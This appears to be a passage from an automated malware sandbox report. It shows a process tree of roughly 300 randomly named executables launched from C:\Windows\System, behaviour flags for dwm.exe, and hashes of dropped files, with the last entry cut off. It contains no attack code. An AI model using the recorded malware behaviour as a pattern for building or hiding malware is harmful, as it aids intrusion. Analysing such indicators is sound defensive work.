C:\Windows\System\wMENxjD.exeC:\Windows\System\wMENxjD.exe2⤵
-
C:\Windows\System\SmHQjEl.exeC:\Windows\System\SmHQjEl.exe2⤵
-
C:\Windows\System\qHmcMnB.exeC:\Windows\System\qHmcMnB.exe2⤵
-
C:\Windows\System\WMUhbPR.exeC:\Windows\System\WMUhbPR.exe2⤵
-
C:\Windows\System\EyzNOZx.exeC:\Windows\System\EyzNOZx.exe2⤵
-
C:\Windows\System\DdaAOhP.exeC:\Windows\System\DdaAOhP.exe2⤵
-
C:\Windows\System\ypCIICw.exeC:\Windows\System\ypCIICw.exe2⤵
-
C:\Windows\System\sOKyDZK.exeC:\Windows\System\sOKyDZK.exe2⤵
-
C:\Windows\System\DLYncPf.exeC:\Windows\System\DLYncPf.exe2⤵
-
C:\Windows\System\oWkSwZa.exeC:\Windows\System\oWkSwZa.exe2⤵
-
C:\Windows\System\luZLTry.exeC:\Windows\System\luZLTry.exe2⤵
-
C:\Windows\System\sAXgHqQ.exeC:\Windows\System\sAXgHqQ.exe2⤵
-
C:\Windows\System\aepHDue.exeC:\Windows\System\aepHDue.exe2⤵
-
C:\Windows\System\SwTAMbv.exeC:\Windows\System\SwTAMbv.exe2⤵
-
C:\Windows\System\qvjVAVg.exeC:\Windows\System\qvjVAVg.exe2⤵
-
C:\Windows\System\uoDnQLB.exeC:\Windows\System\uoDnQLB.exe2⤵
-
C:\Windows\System\zYBgApV.exeC:\Windows\System\zYBgApV.exe2⤵
-
C:\Windows\System\FhRaWPe.exeC:\Windows\System\FhRaWPe.exe2⤵
-
C:\Windows\System\fyeEKZP.exeC:\Windows\System\fyeEKZP.exe2⤵
-
C:\Windows\System\EwRtpWe.exeC:\Windows\System\EwRtpWe.exe2⤵
-
C:\Windows\System\CsQNcwc.exeC:\Windows\System\CsQNcwc.exe2⤵
-
C:\Windows\System\BCccCol.exeC:\Windows\System\BCccCol.exe2⤵
-
C:\Windows\System\wxyhBRZ.exeC:\Windows\System\wxyhBRZ.exe2⤵
-
C:\Windows\System\AvgfXZB.exeC:\Windows\System\AvgfXZB.exe2⤵
-
C:\Windows\System\oUabKAA.exeC:\Windows\System\oUabKAA.exe2⤵
-
C:\Windows\System\bwUEdnE.exeC:\Windows\System\bwUEdnE.exe2⤵
-
C:\Windows\System\SudpWCf.exeC:\Windows\System\SudpWCf.exe2⤵
-
C:\Windows\System\LWEGmfQ.exeC:\Windows\System\LWEGmfQ.exe2⤵
-
C:\Windows\System\bYRvrtl.exeC:\Windows\System\bYRvrtl.exe2⤵
-
C:\Windows\System\xxzVxLT.exeC:\Windows\System\xxzVxLT.exe2⤵
-
C:\Windows\System\trpyidw.exeC:\Windows\System\trpyidw.exe2⤵
-
C:\Windows\System\gavCWgK.exeC:\Windows\System\gavCWgK.exe2⤵
-
C:\Windows\System\fzSjsok.exeC:\Windows\System\fzSjsok.exe2⤵
-
C:\Windows\System\jAPshLL.exeC:\Windows\System\jAPshLL.exe2⤵
-
C:\Windows\System\xpQBTpM.exeC:\Windows\System\xpQBTpM.exe2⤵
-
C:\Windows\System\mSWGcjf.exeC:\Windows\System\mSWGcjf.exe2⤵
-
C:\Windows\System\iAzHwfZ.exeC:\Windows\System\iAzHwfZ.exe2⤵
-
C:\Windows\System\HJxiton.exeC:\Windows\System\HJxiton.exe2⤵
-
C:\Windows\System\PqGxKYu.exeC:\Windows\System\PqGxKYu.exe2⤵
-
C:\Windows\System\ZDjHpiA.exeC:\Windows\System\ZDjHpiA.exe2⤵
-
C:\Windows\System\tWEhwNG.exeC:\Windows\System\tWEhwNG.exe2⤵
-
C:\Windows\System\qNxpwUj.exeC:\Windows\System\qNxpwUj.exe2⤵
-
C:\Windows\System\tUzocBS.exeC:\Windows\System\tUzocBS.exe2⤵
-
C:\Windows\System\zjKnemi.exeC:\Windows\System\zjKnemi.exe2⤵
-
C:\Windows\System\sLtwxLy.exeC:\Windows\System\sLtwxLy.exe2⤵
-
C:\Windows\System\qVmclOx.exeC:\Windows\System\qVmclOx.exe2⤵
-
C:\Windows\System\baHlAwF.exeC:\Windows\System\baHlAwF.exe2⤵
-
C:\Windows\System\UBxTjXd.exeC:\Windows\System\UBxTjXd.exe2⤵
-
C:\Windows\System\fnVawuP.exeC:\Windows\System\fnVawuP.exe2⤵
-
C:\Windows\System\ADJcGNv.exeC:\Windows\System\ADJcGNv.exe2⤵
-
C:\Windows\System\RqAMQcr.exeC:\Windows\System\RqAMQcr.exe2⤵
-
C:\Windows\System\CgPYuka.exeC:\Windows\System\CgPYuka.exe2⤵
-
C:\Windows\System\lHgCTzn.exeC:\Windows\System\lHgCTzn.exe2⤵
-
C:\Windows\System\BEYjRpQ.exeC:\Windows\System\BEYjRpQ.exe2⤵
-
C:\Windows\System\wRiNdOx.exeC:\Windows\System\wRiNdOx.exe2⤵
-
C:\Windows\System\mfuXCYq.exeC:\Windows\System\mfuXCYq.exe2⤵
-
C:\Windows\System\klRPMno.exeC:\Windows\System\klRPMno.exe2⤵
-
C:\Windows\System\klPazYJ.exeC:\Windows\System\klPazYJ.exe2⤵
-
C:\Windows\System\VjmTSuI.exeC:\Windows\System\VjmTSuI.exe2⤵
-
C:\Windows\System\dmfzUKI.exeC:\Windows\System\dmfzUKI.exe2⤵
-
C:\Windows\System\tnbeBef.exeC:\Windows\System\tnbeBef.exe2⤵
-
C:\Windows\System\PRtbgMn.exeC:\Windows\System\PRtbgMn.exe2⤵
-
C:\Windows\System\mJPwubi.exeC:\Windows\System\mJPwubi.exe2⤵
-
C:\Windows\System\IpuBIOB.exeC:\Windows\System\IpuBIOB.exe2⤵
-
C:\Windows\System\lMuZSNn.exeC:\Windows\System\lMuZSNn.exe2⤵
-
C:\Windows\System\kHmAcJd.exeC:\Windows\System\kHmAcJd.exe2⤵
-
C:\Windows\System\lCzrUEN.exeC:\Windows\System\lCzrUEN.exe2⤵
-
C:\Windows\System\vKAisxl.exeC:\Windows\System\vKAisxl.exe2⤵
-
C:\Windows\System\iKFnNUI.exeC:\Windows\System\iKFnNUI.exe2⤵
-
C:\Windows\System\MyvoQQW.exeC:\Windows\System\MyvoQQW.exe2⤵
-
C:\Windows\System\MZZzggc.exeC:\Windows\System\MZZzggc.exe2⤵
-
C:\Windows\System\aAcNQNK.exeC:\Windows\System\aAcNQNK.exe2⤵
-
C:\Windows\System\PHMMocc.exeC:\Windows\System\PHMMocc.exe2⤵
-
C:\Windows\System\dqTYwfh.exeC:\Windows\System\dqTYwfh.exe2⤵
-
C:\Windows\System\VvGNlGf.exeC:\Windows\System\VvGNlGf.exe2⤵
-
C:\Windows\System\CSAfWzb.exeC:\Windows\System\CSAfWzb.exe2⤵
-
C:\Windows\System\GNLUYiy.exeC:\Windows\System\GNLUYiy.exe2⤵
-
C:\Windows\System\fOwNfGX.exeC:\Windows\System\fOwNfGX.exe2⤵
-
C:\Windows\System\QumxMXK.exeC:\Windows\System\QumxMXK.exe2⤵
-
C:\Windows\System\dVJUfJf.exeC:\Windows\System\dVJUfJf.exe2⤵
-
C:\Windows\System\wjuOZpB.exeC:\Windows\System\wjuOZpB.exe2⤵
-
C:\Windows\System\MnLCpgO.exeC:\Windows\System\MnLCpgO.exe2⤵
-
C:\Windows\System\DaIHHZE.exeC:\Windows\System\DaIHHZE.exe2⤵
-
C:\Windows\System\QZcYTZe.exeC:\Windows\System\QZcYTZe.exe2⤵
-
C:\Windows\System\NsVyDJH.exeC:\Windows\System\NsVyDJH.exe2⤵
-
C:\Windows\System\DulZpVk.exeC:\Windows\System\DulZpVk.exe2⤵
-
C:\Windows\System\Fagsgzo.exeC:\Windows\System\Fagsgzo.exe2⤵
-
C:\Windows\System\BVdfHkc.exeC:\Windows\System\BVdfHkc.exe2⤵
-
C:\Windows\System\CLimgHS.exeC:\Windows\System\CLimgHS.exe2⤵
-
C:\Windows\System\HdkSIqY.exeC:\Windows\System\HdkSIqY.exe2⤵
-
C:\Windows\System\fMZRQog.exeC:\Windows\System\fMZRQog.exe2⤵
-
C:\Windows\System\VSTYwIa.exeC:\Windows\System\VSTYwIa.exe2⤵
-
C:\Windows\System\BYrvGpq.exeC:\Windows\System\BYrvGpq.exe2⤵
-
C:\Windows\System\vScIqkp.exeC:\Windows\System\vScIqkp.exe2⤵
-
C:\Windows\System\pTGVBWM.exeC:\Windows\System\pTGVBWM.exe2⤵
-
C:\Windows\System\dFejnEx.exeC:\Windows\System\dFejnEx.exe2⤵
-
C:\Windows\System\XzQXUWW.exeC:\Windows\System\XzQXUWW.exe2⤵
-
C:\Windows\System\lOYazKa.exeC:\Windows\System\lOYazKa.exe2⤵
-
C:\Windows\System\cJkiDTA.exeC:\Windows\System\cJkiDTA.exe2⤵
-
C:\Windows\System\hvuotVl.exeC:\Windows\System\hvuotVl.exe2⤵
-
C:\Windows\System\OXlJauF.exeC:\Windows\System\OXlJauF.exe2⤵
-
C:\Windows\System\LNDVERk.exeC:\Windows\System\LNDVERk.exe2⤵
-
C:\Windows\System\hDAxLVX.exeC:\Windows\System\hDAxLVX.exe2⤵
-
C:\Windows\System\LuxbfMv.exeC:\Windows\System\LuxbfMv.exe2⤵
-
C:\Windows\System\OXvciUf.exeC:\Windows\System\OXvciUf.exe2⤵
-
C:\Windows\System\NvlGHev.exeC:\Windows\System\NvlGHev.exe2⤵
-
C:\Windows\System\TIVJkrt.exeC:\Windows\System\TIVJkrt.exe2⤵
-
C:\Windows\System\OjlDCZh.exeC:\Windows\System\OjlDCZh.exe2⤵
-
C:\Windows\System\cPAyLFS.exeC:\Windows\System\cPAyLFS.exe2⤵
-
C:\Windows\System\YwODRMh.exeC:\Windows\System\YwODRMh.exe2⤵
-
C:\Windows\System\INfpwSt.exeC:\Windows\System\INfpwSt.exe2⤵
-
C:\Windows\System\VccfJOD.exeC:\Windows\System\VccfJOD.exe2⤵
-
C:\Windows\System\jKznFWR.exeC:\Windows\System\jKznFWR.exe2⤵
-
C:\Windows\System\rCmgujf.exeC:\Windows\System\rCmgujf.exe2⤵
-
C:\Windows\System\tiMQOuP.exeC:\Windows\System\tiMQOuP.exe2⤵
-
C:\Windows\System\GYkDbnF.exeC:\Windows\System\GYkDbnF.exe2⤵
-
C:\Windows\System\umuWFDD.exeC:\Windows\System\umuWFDD.exe2⤵
-
C:\Windows\System\JsqIIzd.exeC:\Windows\System\JsqIIzd.exe2⤵
-
C:\Windows\System\eMPNKjR.exeC:\Windows\System\eMPNKjR.exe2⤵
-
C:\Windows\System\yFqcPAr.exeC:\Windows\System\yFqcPAr.exe2⤵
-
C:\Windows\System\jCBccxW.exeC:\Windows\System\jCBccxW.exe2⤵
-
C:\Windows\System\FRUPwSr.exeC:\Windows\System\FRUPwSr.exe2⤵
-
C:\Windows\System\ggqSvnn.exeC:\Windows\System\ggqSvnn.exe2⤵
-
C:\Windows\System\fnFwYWH.exeC:\Windows\System\fnFwYWH.exe2⤵
-
C:\Windows\System\mUnzJsr.exeC:\Windows\System\mUnzJsr.exe2⤵
-
C:\Windows\System\eYSEysh.exeC:\Windows\System\eYSEysh.exe2⤵
-
C:\Windows\System\xdlbBUw.exeC:\Windows\System\xdlbBUw.exe2⤵
-
C:\Windows\System\fvmNYJV.exeC:\Windows\System\fvmNYJV.exe2⤵
-
C:\Windows\System\oEemzQc.exeC:\Windows\System\oEemzQc.exe2⤵
-
C:\Windows\System\RRFiblX.exeC:\Windows\System\RRFiblX.exe2⤵
-
C:\Windows\System\cupJVks.exeC:\Windows\System\cupJVks.exe2⤵
-
C:\Windows\System\dYeUMIy.exeC:\Windows\System\dYeUMIy.exe2⤵
-
C:\Windows\System\xrrsCVl.exeC:\Windows\System\xrrsCVl.exe2⤵
-
C:\Windows\System\mHXjPNN.exeC:\Windows\System\mHXjPNN.exe2⤵
-
C:\Windows\System\bofZzXR.exeC:\Windows\System\bofZzXR.exe2⤵
-
C:\Windows\System\XsECKZs.exeC:\Windows\System\XsECKZs.exe2⤵
-
C:\Windows\System\lNqJANu.exeC:\Windows\System\lNqJANu.exe2⤵
-
C:\Windows\System\aafMTYq.exeC:\Windows\System\aafMTYq.exe2⤵
-
C:\Windows\System\uykUlok.exeC:\Windows\System\uykUlok.exe2⤵
-
C:\Windows\System\WuHhTBX.exeC:\Windows\System\WuHhTBX.exe2⤵
-
C:\Windows\System\ylFCXSR.exeC:\Windows\System\ylFCXSR.exe2⤵
-
C:\Windows\System\NaUuZqQ.exeC:\Windows\System\NaUuZqQ.exe2⤵
-
C:\Windows\System\fpLBvyI.exeC:\Windows\System\fpLBvyI.exe2⤵
-
C:\Windows\System\wzgbfTv.exeC:\Windows\System\wzgbfTv.exe2⤵
-
C:\Windows\System\kRVzLtC.exeC:\Windows\System\kRVzLtC.exe2⤵
-
C:\Windows\System\nPWQZbd.exeC:\Windows\System\nPWQZbd.exe2⤵
-
C:\Windows\System\LrqwCdb.exeC:\Windows\System\LrqwCdb.exe2⤵
-
C:\Windows\System\vpyrIev.exeC:\Windows\System\vpyrIev.exe2⤵
-
C:\Windows\System\fqfFFuI.exeC:\Windows\System\fqfFFuI.exe2⤵
-
C:\Windows\System\pdpawHf.exeC:\Windows\System\pdpawHf.exe2⤵
-
C:\Windows\System\IfwKbXE.exeC:\Windows\System\IfwKbXE.exe2⤵
-
C:\Windows\System\BTjCtpV.exeC:\Windows\System\BTjCtpV.exe2⤵
-
C:\Windows\System\VitxWmw.exeC:\Windows\System\VitxWmw.exe2⤵
-
C:\Windows\System\KQpycYP.exeC:\Windows\System\KQpycYP.exe2⤵
-
C:\Windows\System\zTCMwpR.exeC:\Windows\System\zTCMwpR.exe2⤵
-
C:\Windows\System\TlNzKmx.exeC:\Windows\System\TlNzKmx.exe2⤵
-
C:\Windows\System\qpNJGZm.exeC:\Windows\System\qpNJGZm.exe2⤵
-
C:\Windows\System\fyRniWv.exeC:\Windows\System\fyRniWv.exe2⤵
-
C:\Windows\System\qPtzDIl.exeC:\Windows\System\qPtzDIl.exe2⤵
-
C:\Windows\System\KGuvCqj.exeC:\Windows\System\KGuvCqj.exe2⤵
-
C:\Windows\System\xuKsVaB.exeC:\Windows\System\xuKsVaB.exe2⤵
-
C:\Windows\System\SMtlaDr.exeC:\Windows\System\SMtlaDr.exe2⤵
-
C:\Windows\System\qFAgaxO.exeC:\Windows\System\qFAgaxO.exe2⤵
-
C:\Windows\System\yIieVFI.exeC:\Windows\System\yIieVFI.exe2⤵
-
C:\Windows\System\OfgEWPo.exeC:\Windows\System\OfgEWPo.exe2⤵
-
C:\Windows\System\saJliSV.exeC:\Windows\System\saJliSV.exe2⤵
-
C:\Windows\System\lvaiYzM.exeC:\Windows\System\lvaiYzM.exe2⤵
-
C:\Windows\System\QiqxKNV.exeC:\Windows\System\QiqxKNV.exe2⤵
-
C:\Windows\System\NDdTXsd.exeC:\Windows\System\NDdTXsd.exe2⤵
-
C:\Windows\System\sfZFoPB.exeC:\Windows\System\sfZFoPB.exe2⤵
-
C:\Windows\System\yOPDrdP.exeC:\Windows\System\yOPDrdP.exe2⤵
-
C:\Windows\System\SRgsyWK.exeC:\Windows\System\SRgsyWK.exe2⤵
-
C:\Windows\System\wLEFDes.exeC:\Windows\System\wLEFDes.exe2⤵
-
C:\Windows\System\jPhqKOC.exeC:\Windows\System\jPhqKOC.exe2⤵
-
C:\Windows\System\iLyZflS.exeC:\Windows\System\iLyZflS.exe2⤵
-
C:\Windows\System\ydLxdTV.exeC:\Windows\System\ydLxdTV.exe2⤵
-
C:\Windows\System\SkINOPs.exeC:\Windows\System\SkINOPs.exe2⤵
-
C:\Windows\System\pSgfWAt.exeC:\Windows\System\pSgfWAt.exe2⤵
-
C:\Windows\System\lAUCavq.exeC:\Windows\System\lAUCavq.exe2⤵
-
C:\Windows\System\LMXacwI.exeC:\Windows\System\LMXacwI.exe2⤵
-
C:\Windows\System\SiUsJXx.exeC:\Windows\System\SiUsJXx.exe2⤵
-
C:\Windows\System\DSbVbJC.exeC:\Windows\System\DSbVbJC.exe2⤵
-
C:\Windows\System\ZbvOvZx.exeC:\Windows\System\ZbvOvZx.exe2⤵
-
C:\Windows\System\qoKEOPs.exeC:\Windows\System\qoKEOPs.exe2⤵
-
C:\Windows\System\LGMdDbt.exeC:\Windows\System\LGMdDbt.exe2⤵
-
C:\Windows\System\lGlvLAb.exeC:\Windows\System\lGlvLAb.exe2⤵
-
C:\Windows\System\aikPpAB.exeC:\Windows\System\aikPpAB.exe2⤵
-
C:\Windows\System\bDiMsum.exeC:\Windows\System\bDiMsum.exe2⤵
-
C:\Windows\System\jGsHeui.exeC:\Windows\System\jGsHeui.exe2⤵
-
C:\Windows\System\qiBlABX.exeC:\Windows\System\qiBlABX.exe2⤵
-
C:\Windows\System\NYGirXL.exeC:\Windows\System\NYGirXL.exe2⤵
-
C:\Windows\System\OCWwOHA.exeC:\Windows\System\OCWwOHA.exe2⤵
-
C:\Windows\System\BHcrPJF.exeC:\Windows\System\BHcrPJF.exe2⤵
-
C:\Windows\System\XgJTjEH.exeC:\Windows\System\XgJTjEH.exe2⤵
-
C:\Windows\System\fXkpJLF.exeC:\Windows\System\fXkpJLF.exe2⤵
-
C:\Windows\System\VwmegUr.exeC:\Windows\System\VwmegUr.exe2⤵
-
C:\Windows\System\zSvqdiR.exeC:\Windows\System\zSvqdiR.exe2⤵
-
C:\Windows\System\CiZfofA.exeC:\Windows\System\CiZfofA.exe2⤵
-
C:\Windows\System\AeUUSIy.exeC:\Windows\System\AeUUSIy.exe2⤵
-
C:\Windows\System\EAAZXgB.exeC:\Windows\System\EAAZXgB.exe2⤵
-
C:\Windows\System\pzrqnIE.exeC:\Windows\System\pzrqnIE.exe2⤵
-
C:\Windows\System\PAYRKdW.exeC:\Windows\System\PAYRKdW.exe2⤵
-
C:\Windows\System\CCmmqhr.exeC:\Windows\System\CCmmqhr.exe2⤵
-
C:\Windows\System\nmksFUg.exeC:\Windows\System\nmksFUg.exe2⤵
-
C:\Windows\System\qCbfDxr.exeC:\Windows\System\qCbfDxr.exe2⤵
-
C:\Windows\System\FqSzPQN.exeC:\Windows\System\FqSzPQN.exe2⤵
-
C:\Windows\System\sDDduFL.exeC:\Windows\System\sDDduFL.exe2⤵
-
C:\Windows\System\jusYBQd.exeC:\Windows\System\jusYBQd.exe2⤵
-
C:\Windows\System\ZrgxYDH.exeC:\Windows\System\ZrgxYDH.exe2⤵
-
C:\Windows\System\hvuTOCe.exeC:\Windows\System\hvuTOCe.exe2⤵
-
C:\Windows\System\yqGznUR.exeC:\Windows\System\yqGznUR.exe2⤵
-
C:\Windows\System\LMqdBXQ.exeC:\Windows\System\LMqdBXQ.exe2⤵
-
C:\Windows\System\tcJCwVI.exeC:\Windows\System\tcJCwVI.exe2⤵
-
C:\Windows\System\KsfqDeb.exeC:\Windows\System\KsfqDeb.exe2⤵
-
C:\Windows\System\MHgtiHQ.exeC:\Windows\System\MHgtiHQ.exe2⤵
-
C:\Windows\System\dLheBSw.exeC:\Windows\System\dLheBSw.exe2⤵
-
C:\Windows\System\WLDwnwM.exeC:\Windows\System\WLDwnwM.exe2⤵
-
C:\Windows\System\IYLpWuF.exeC:\Windows\System\IYLpWuF.exe2⤵
-
C:\Windows\System\rcPwGVz.exeC:\Windows\System\rcPwGVz.exe2⤵
-
C:\Windows\System\ECRZQmp.exeC:\Windows\System\ECRZQmp.exe2⤵
-
C:\Windows\System\CQkhELY.exeC:\Windows\System\CQkhELY.exe2⤵
-
C:\Windows\System\sCbqSmp.exeC:\Windows\System\sCbqSmp.exe2⤵
-
C:\Windows\System\KyLqVzK.exeC:\Windows\System\KyLqVzK.exe2⤵
-
C:\Windows\System\bcrAjEv.exeC:\Windows\System\bcrAjEv.exe2⤵
-
C:\Windows\System\oppFQvN.exeC:\Windows\System\oppFQvN.exe2⤵
-
C:\Windows\System\jgrrfkr.exeC:\Windows\System\jgrrfkr.exe2⤵
-
C:\Windows\System\hvudqmT.exeC:\Windows\System\hvudqmT.exe2⤵
-
C:\Windows\System\BYPcQFw.exeC:\Windows\System\BYPcQFw.exe2⤵
-
C:\Windows\System\egEOPDh.exeC:\Windows\System\egEOPDh.exe2⤵
-
C:\Windows\System\jJJFXNf.exeC:\Windows\System\jJJFXNf.exe2⤵
-
C:\Windows\System\XbCrQGB.exeC:\Windows\System\XbCrQGB.exe2⤵
-
C:\Windows\System\VjRdvuR.exeC:\Windows\System\VjRdvuR.exe2⤵
-
C:\Windows\System\ZKCOgaL.exeC:\Windows\System\ZKCOgaL.exe2⤵
-
C:\Windows\System\fLKGCHi.exeC:\Windows\System\fLKGCHi.exe2⤵
-
C:\Windows\System\kYhATdn.exeC:\Windows\System\kYhATdn.exe2⤵
-
C:\Windows\System\wShhRPr.exeC:\Windows\System\wShhRPr.exe2⤵
-
C:\Windows\System\QFxrUnp.exeC:\Windows\System\QFxrUnp.exe2⤵
-
C:\Windows\System\AMCZZOg.exeC:\Windows\System\AMCZZOg.exe2⤵
-
C:\Windows\System\ldzwqOL.exeC:\Windows\System\ldzwqOL.exe2⤵
-
C:\Windows\System\fnHJGLN.exeC:\Windows\System\fnHJGLN.exe2⤵
-
C:\Windows\System\NZMbPdo.exeC:\Windows\System\NZMbPdo.exe2⤵
-
C:\Windows\System\PLywllB.exeC:\Windows\System\PLywllB.exe2⤵
-
C:\Windows\System\sTODznw.exeC:\Windows\System\sTODznw.exe2⤵
-
C:\Windows\System\SWghRec.exeC:\Windows\System\SWghRec.exe2⤵
-
C:\Windows\System\egzQzjX.exeC:\Windows\System\egzQzjX.exe2⤵
-
C:\Windows\System\ecjKpFR.exeC:\Windows\System\ecjKpFR.exe2⤵
-
C:\Windows\System\OkibgRy.exeC:\Windows\System\OkibgRy.exe2⤵
-
C:\Windows\System\uAiWSlr.exeC:\Windows\System\uAiWSlr.exe2⤵
-
C:\Windows\System\EVVuufB.exeC:\Windows\System\EVVuufB.exe2⤵
-
C:\Windows\System\SlTQMNV.exeC:\Windows\System\SlTQMNV.exe2⤵
-
C:\Windows\System\sZVOWXl.exeC:\Windows\System\sZVOWXl.exe2⤵
-
C:\Windows\System\geNNLse.exeC:\Windows\System\geNNLse.exe2⤵
-
C:\Windows\System\DNhwoaY.exeC:\Windows\System\DNhwoaY.exe2⤵
-
C:\Windows\System\gDfiGji.exeC:\Windows\System\gDfiGji.exe2⤵
-
C:\Windows\System\LvZNQGH.exeC:\Windows\System\LvZNQGH.exe2⤵
-
C:\Windows\System\ReTUBsy.exeC:\Windows\System\ReTUBsy.exe2⤵
-
C:\Windows\System\nkRUOqv.exeC:\Windows\System\nkRUOqv.exe2⤵
-
C:\Windows\System\YllRteP.exeC:\Windows\System\YllRteP.exe2⤵
-
C:\Windows\System\FJwaFhK.exeC:\Windows\System\FJwaFhK.exe2⤵
-
C:\Windows\System\urVQjxV.exeC:\Windows\System\urVQjxV.exe2⤵
-
C:\Windows\System\QVrrZio.exeC:\Windows\System\QVrrZio.exe2⤵
-
C:\Windows\System\ftaXOql.exeC:\Windows\System\ftaXOql.exe2⤵
-
C:\Windows\System\ujnnYFw.exeC:\Windows\System\ujnnYFw.exe2⤵
-
C:\Windows\System\dOFXQix.exeC:\Windows\System\dOFXQix.exe2⤵
-
C:\Windows\System\uIbnqEr.exeC:\Windows\System\uIbnqEr.exe2⤵
-
C:\Windows\System\zHVanRs.exeC:\Windows\System\zHVanRs.exe2⤵
-
C:\Windows\System\OkpqBpM.exeC:\Windows\System\OkpqBpM.exe2⤵
-
C:\Windows\System\WRlDCAJ.exeC:\Windows\System\WRlDCAJ.exe2⤵
-
C:\Windows\System\BxPSFDv.exeC:\Windows\System\BxPSFDv.exe2⤵
-
C:\Windows\System\fBmcNuz.exeC:\Windows\System\fBmcNuz.exe2⤵
-
C:\Windows\System\eJOURib.exeC:\Windows\System\eJOURib.exe2⤵
-
C:\Windows\System\ZvsEVou.exeC:\Windows\System\ZvsEVou.exe2⤵
-
C:\Windows\System\HvpngSa.exeC:\Windows\System\HvpngSa.exe2⤵
-
C:\Windows\System\HlLylUi.exeC:\Windows\System\HlLylUi.exe2⤵
-
C:\Windows\System\VNNBVWu.exeC:\Windows\System\VNNBVWu.exe2⤵
-
C:\Windows\System\JShNJGC.exeC:\Windows\System\JShNJGC.exe2⤵
-
C:\Windows\System\PscusMu.exeC:\Windows\System\PscusMu.exe2⤵
-
C:\Windows\System\YFQEaKr.exeC:\Windows\System\YFQEaKr.exe2⤵
-
C:\Windows\System\mCdIIdJ.exeC:\Windows\System\mCdIIdJ.exe2⤵
-
C:\Windows\System\hEYhWVT.exeC:\Windows\System\hEYhWVT.exe2⤵
-
C:\Windows\System\tYYHQeI.exeC:\Windows\System\tYYHQeI.exe2⤵
-
C:\Windows\System\eVJOmex.exeC:\Windows\System\eVJOmex.exe2⤵
-
C:\Windows\System\TlRaxsR.exeC:\Windows\System\TlRaxsR.exe2⤵
-
C:\Windows\System\SvsQtCZ.exeC:\Windows\System\SvsQtCZ.exe2⤵
-
C:\Windows\System\KgfLjZN.exeC:\Windows\System\KgfLjZN.exe2⤵
-
C:\Windows\System\DpJhlLR.exeC:\Windows\System\DpJhlLR.exe2⤵
-
C:\Windows\System\OIbBGXw.exeC:\Windows\System\OIbBGXw.exe2⤵
-
C:\Windows\System\HGoApZm.exeC:\Windows\System\HGoApZm.exe2⤵
-
C:\Windows\System\tGsKklZ.exeC:\Windows\System\tGsKklZ.exe2⤵
-
C:\Windows\System\IxuWeHO.exeC:\Windows\System\IxuWeHO.exe2⤵
-
C:\Windows\System\fefcLRG.exeC:\Windows\System\fefcLRG.exe2⤵
-
C:\Windows\System\ZXwWIrI.exeC:\Windows\System\ZXwWIrI.exe2⤵
-
C:\Windows\System\CeIqWLd.exeC:\Windows\System\CeIqWLd.exe2⤵
-
C:\Windows\System\rDfZdAV.exeC:\Windows\System\rDfZdAV.exe2⤵
-
C:\Windows\System\WuAjMCI.exeC:\Windows\System\WuAjMCI.exe2⤵
-
C:\Windows\System\dlkDuJI.exeC:\Windows\System\dlkDuJI.exe2⤵
-
C:\Windows\System\LJhuVcG.exeC:\Windows\System\LJhuVcG.exe2⤵
-
C:\Windows\System\lMYJyGy.exeC:\Windows\System\lMYJyGy.exe2⤵
-
C:\Windows\System\lEcTEhy.exeC:\Windows\System\lEcTEhy.exe2⤵
-
C:\Windows\System\szAdweA.exeC:\Windows\System\szAdweA.exe2⤵
-
C:\Windows\System\PUrXXuB.exeC:\Windows\System\PUrXXuB.exe2⤵
-
C:\Windows\System\GJmspTX.exeC:\Windows\System\GJmspTX.exe2⤵
-
C:\Windows\System\mXzytNz.exeC:\Windows\System\mXzytNz.exe2⤵
-
C:\Windows\System\NUXfwIJ.exeC:\Windows\System\NUXfwIJ.exe2⤵
-
C:\Windows\System\KGJKjZI.exeC:\Windows\System\KGJKjZI.exe2⤵
-
C:\Windows\System\YrembhQ.exeC:\Windows\System\YrembhQ.exe2⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5vvbke2.r1t.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\System\DJSRmCJ.exeFilesize
1.9MB
MD5e7c1518f9b9fd45ca40aa73315d3f542
SHA18564d6a26e3014d7a2723976b432b91074302909
SHA2561afaa2c57c83aad10a1936d2480c888e65db26deba80299881d2f69fb98dcd9e
SHA51225837400422d67f8caf9338b9bef0254fcc647ee708df2d616270eea042e00e618881be742fdf8e44cf0efcc991d4230cba0a8594e23a5f1e5079ab8b7fd731c
-
C:\Windows\System\EGLkfBq.exeFilesize
1.9MB
MD537ae5eff6f9811233ad45d88ce6c5a88
SHA13a3e29bd4a7aa864b957f6a085f5079611f8342f
SHA2565ccacad4d1416b565263514cddc03543ef9d9088ee8d850752d94340bbf530b5
SHA512ea68c9140ff347d4821217e169326b6999e454cab015ad301735710df4f1712fc4a9ad86a022e7fb29eb97df428c68d31b8b5faad38569bca60f3ced42d8eeab
-
C:\Windows\System\EPzdxmJ.exeFilesize
1.9MB
MD5174511abe6dfecc5fc3d60d4e06dbb01
SHA155b4a501bbef1f99b11628bdfdf66420425c50af
SHA25695429131459712da8b63a3a9af4fd656078743ef90378fbf52de3250c500a946
SHA512805a8323ac65ebf7124fa60250b063a322f4c7161c618cc8e6f396a855aedda69033c5ec5e4ab8e174c4d88991214c71d9d055e0e7a6921388c0afe6c63dad1d
-
C:\Windows\System\FCIlfiz.exeFilesize
1.9MB
MD57c40240677491b1096947b7707033fce
SHA1a7a15ee2fee4ead8b8b19b0bb50043769b795d6b
SHA256fe05573e2f5a4d769812f96c1f52a4b8fc82a0450059b48fcc06cb5cc4bfef5a
SHA512b8f377d415f6d5cb310e6b7fbca227b61b9eb058cd1731bbb9187c0a416c3bff7ae8b1a9611f3198a228702f61f004e9dfcb3f4fee4dbb1eb97bd756fcbe375e
-
C:\Windows\System\GaDeUOV.exeFilesize
1.9MB
MD585b4fc39ca344d64d23ed3eb168832c6
SHA1bf83b9247db7e87dd2163362f312a2f5e80f52ef
SHA25684e8e43e34ecada7a7cfefc313915f55c4ceda322905f41104a72832a3b0938e
